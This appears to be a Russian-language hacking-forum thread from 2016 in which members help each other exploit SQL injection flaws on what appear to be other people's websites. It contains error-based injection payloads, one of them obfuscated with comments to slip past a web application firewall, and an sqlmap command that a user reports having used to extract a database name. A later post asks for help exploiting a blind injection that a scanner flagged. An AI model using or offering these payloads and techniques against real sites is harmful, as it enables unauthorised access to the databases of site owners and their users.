PDA

Просмотр полной версии : SQL /site/1'

magichead
10.02.2016, 08:22
Помогите расскрутить sql

Вид такой:

site.com/city/1'

Все перелазил ничего не нашел!

Код ошибки

1)Throwable_SQL_Exception [ 0 ]: Message: Failed to query SQL statement. Reason: Incorrect syntax near 'id' and Draft = 0'.


MODPATH/leap/classes/Base/DB/MsSQL/DataReader/Standard.php [ 48 ]

43 */
44 public function __construct(DB_Connection_Driver $connection, $sql, $mode = NULL) {
45 $resource = $connection->get_resource();
46 $command = @mssql_query($sql, $resource);
47 if ($command === FALSE) {
48 throw new Throwable_SQL_Exception('Message: Failed to query SQL statement. Reason: :reason', array(':reason' => @mssql_get_last_message()));
49 }
50 $this->command = $command;
51 $this->record = FALSE;
52 }
OxoTnik
10.02.2016, 10:02
Error dased
magichead
10.02.2016, 10:48
↑ (https://antichat.live/posts/3951119/)
Error dased


это как понять?

site.com/city/1' - не могу понять как сделать правельную sql типо .php?city=1'
OxoTnik
10.02.2016, 11:16
site.com/city/1'or(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and(1)='1
magichead
10.02.2016, 13:21
↑ (https://antichat.live/posts/3951137/)
site.com/city/1
'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1


Перекидывает на 404

А можно в sqlmap какнибудь раскрутить?
MaxFast
10.02.2016, 14:25
Есть ещё один прекрасный вектор, который может сработать в твоей ситуации.


site.com/city/-1+/*!aNd*/+/*!ExTRaCtVaLuE*/(1,/*!CoNcAt*/(0x3a,(version()))+--+

Местный WAF всему виной.
magichead
10.02.2016, 14:47
↑ (https://antichat.live/posts/3951137/)
site.com/city/1
'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1


Перекидывает на 404

А можно в sqlmap какнибудь раскрутить?


↑ (https://antichat.live/posts/3951228/)
Есть ещё один прекрасный вектор, который может сработать в твоей ситуации.

site.com/city/-1+/*!aNd*/+/*!ExTRaCtVaLuE*/(1,/*!CoNcAt*/(0x3a,(version()))+--+

Местный WAF всему виной.


(((всерано перекидывает на 404
Shubka75
10.02.2016, 16:11
↑ (https://antichat.live/posts/3951236/)
А можно в sqlmap какнибудь раскрутить?


sqlmap.py -u "site.com/city/1*" --level=5 --random-agent
magichead
10.02.2016, 21:31
↑ (https://antichat.live/posts/3951288/)
sqlmap.py -u "
site.com/city/1*
" --level=5 --random-agent


Спасибо!Расскрутил,но вот проблема с кодировкой!Пишет что база MSQL 2012,пишет что база найдена.Но в место имени выходит квадрат с четырьмя нулями.Как быть с этим?
blackbox
13.02.2016, 23:20
↑ (https://antichat.live/posts/3951421/)
Спасибо!Расскрутил,но вот проблема с кодировкой!Пишет что база MSQL 2012,пишет что база найдена.Но в место имени выходит квадрат с четырьмя нулями.Как быть с этим?


Можно посмотреть в лог-файле sqlmap, возможно консоль не поддерживает данную кодировку (какая бы она ни была), но это только предположение.
.Light.
02.03.2016, 09:22
Как раскрутить такую скулю?

site.ru/v2-live-with-a-5-1-win/

Acunetix:

Path Fragment (suffix /) input - was set to success' AND 3*2*1=6 AND '000CDY9'='000CDY9

site.ru/v2-live-with-a-5-1-win'%20AND%203*2*1%3d6%20AND%20'000SgxW'%3d'000Sgx W/
BabaDook
03.03.2016, 16:18
↑ (https://antichat.live/posts/3958931/)
Как раскрутить такую скулю?
site.ru/v2-live-with-a-5-1-win/
Acunetix:
Path Fragment (suffix /) input
-
was set to
success' AND 3*2*1=6 AND '000CDY9'='000CDY9
site.ru/v2-live-with-a-5-1-win'%20AND%203*2*1%3d6%20AND%20'000SgxW'%3d'000Sgx W/


site.ru/v2-live-with-a-5-1-win/* не работает?